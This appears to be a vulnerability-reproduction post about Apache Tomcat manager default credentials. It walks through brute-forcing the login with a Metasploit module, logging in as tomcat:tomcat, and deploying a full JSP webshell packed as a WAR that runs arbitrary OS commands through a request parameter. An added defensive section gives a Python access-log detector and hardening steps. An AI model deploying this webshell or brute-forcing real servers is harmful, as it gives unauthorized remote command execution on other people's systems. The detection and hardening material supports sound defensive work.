Affected versions
All versions
Vulnerability reproduction
Brute-forcing with msf
use auxiliary/scanner/http/tomcat_mgr_login
Set the IP and port
set rhosts 10.7.10.41
set rport 8080 (default port)
Execute with run
tomcat:tomcat
Login succeeded
Use an expert's one-line JSP webshell
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
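Then compress shell.jsp into a zip, change the extension so the file is named 1.war, and upload it
Access URL: http://xxxxxx:8080/1/shell.jsp
Pass the parameters pwd and i
?pwd=123&i=ls (executes the command)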
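Seen from the defender's side, the steps above leave a recognizable trail in Tomcat's access log: repeated 401s on /manager/html, a successful login, a POST to /manager/html/upload, then a parameterized request to a JSP in the new context. The detection script below is an added example, not code from the original post; it assumes the "common" access-log pattern, and the log lines, addresses, function name and threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in Tomcat's "common" access-log pattern (%h %l %u %t "%r" %s %b).
# Addresses are documentation ranges; the nonce value is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [01/Jan/2024:10:00:01 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [01/Jan/2024:10:00:02 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - tomcat [01/Jan/2024:10:00:02 +0800] "GET /manager/html HTTP/1.1" 200 17891
192.0.2.10 - tomcat [01/Jan/2024:10:03:10 +0800] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 19012
192.0.2.10 - - [01/Jan/2024:10:03:30 +0800] "GET /1/shell.jsp?pwd=123&i=ls HTTP/1.1" 200 2060
198.51.100.7 - - [01/Jan/2024:10:05:00 +0800] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.7 - - [01/Jan/2024:10:05:09 +0800] "GET /docs/index.jsp?lang=en HTTP/1.1" 200 512
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

def analyze(log_text, fail_threshold=3):
    """Return (finding, client_ip, detail) tuples in log order."""
    fails = defaultdict(int)   # consecutive manager 401s per client
    deployers = set()          # clients that uploaded a WAR
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ip, user, method, uri, status = m.groups()
        path = uri.split("?", 1)[0]
        if path.startswith("/manager/"):
            if status == "401":
                fails[ip] += 1
            elif status == "200":
                if fails[ip] >= fail_threshold:
                    findings.append(("login_after_bruteforce", ip, user))
                fails[ip] = 0
            if method == "POST" and path == "/manager/html/upload" and status == "200":
                findings.append(("war_upload", ip, user))
                deployers.add(ip)
        elif ip in deployers and path.endswith(".jsp") and "?" in uri:
            findings.append(("jsp_with_params_after_deploy", ip, path))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Replacing the default tomcat:tomcat account in tomcat-users.xml and restricting the manager application by source address (RemoteAddrValve), or removing it where unused, closes the path this script detects.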
QQ:3075999532
References:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html